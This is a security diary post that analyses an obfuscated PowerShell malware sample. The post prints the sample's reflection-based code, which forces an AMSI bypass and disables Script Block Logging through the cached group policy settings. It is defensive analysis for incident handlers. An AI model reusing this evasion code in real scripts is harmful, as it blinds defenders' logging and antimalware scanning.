Obfuscated Deactivation of Script Block Logging

Published: 2023-02-10. Last Updated: 2023-02-10 10:09:07 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

PowerShell has a great built-in feature called "Script Block Logging"[1]. It helps to record all activities performed by a script and is a goldmine for incident handlers. That's the reason why attackers tend to try to disable this feature. There are many ways to achieve this, but I found an interesting one.

The obfuscation technique uses a "Collections.Generic.Dictionary" object. This type of collection represents a collection of keys and values. Here is the interesting code (I kept only the code relevant to the collection:

$wi=(('EnableSc{2}ip{1'+'}{3'+'}'+'lo'+'c'+'{0}Logging')-f'k','t','r','B');
$db9=[Collections.Generic.Dictionary[string,System.Object]]::new();
$iN=(('{0}crip{2}'+'B{'+'1}ockL'+'ogg'+'ing')-f'S','l','t');
If($PSVersionTable.PSVersion.Major -ge 3)
{
    $zz=[Ref].Assembly.GetType((('S{5}stem.'+'{'+'3}anagem'+'ent'+'.{0'+'}{4}tomation.{2}ti{'+'1}'+'s')-f'A','l','U','M','u','y'));
    $zqu=[Ref].Assembly.GetType((('{5}{6}'+'st{9'+'}m.{2'+'}'+'a'+'na{3'+'}{'+'9}'+'m{9'+'}'+'nt.{'+'8}{0}t'+'{'+'7'+'}'+'ma'+'ti{'+'7}n'+'.{'+'8'+'}msi{1}ti{4}s')-f'u','U','M','g','l','S','y','o','A','e'));
    $rH=(('E'+'na{0}l'+'eSc{3}ipt{1'+'}loc'+'{4}{2}nvoc'+'ation{5}oggi'+'n'+'g')-f'b','B','I','r','k','L');
    $xTv=$zz.GetField('cachedGroupPolicySettings','NonPublic,Static');
    if ($zqu)
    {
        $zqu.GetField((('a{3'+'}{4}i'+'I{0'+'}'+'i'+'tF'+'ail{2'+'}{1'+'}') f'n','d','e','m','s'),'NonPublic,Static').SetValue($null,$true);
    };
    If ($xTv)
    {
        $iG5H=$xTv.GetValue($null);
        $db9.Add($wi,0);
        $db9.Add($rH,0);
        $iG5H['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\'+$iN]=$db9;

The collection of values is created in the $db9 variable. Later two keys are added, and the collection is used to modify the registry to disable the logging feature.

[DBG]: PS C:\Users\REM>> $db9

Key                                Value
---                                -----
EnableScriptBlockLogging               0
EnableScriptBlockInvocationLogging     0

The remaining part of the script is classic and injects a shellcode in the Powershell process.

[1] https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: Logging Obfuscation PowerShell
0 comment(s)
ISC Stormcast For Friday, February 10th, 2023 https://isc.sans.edu/podcastdetail.html?id=8364

Comments

Login here to join the discussion.


Diary Archives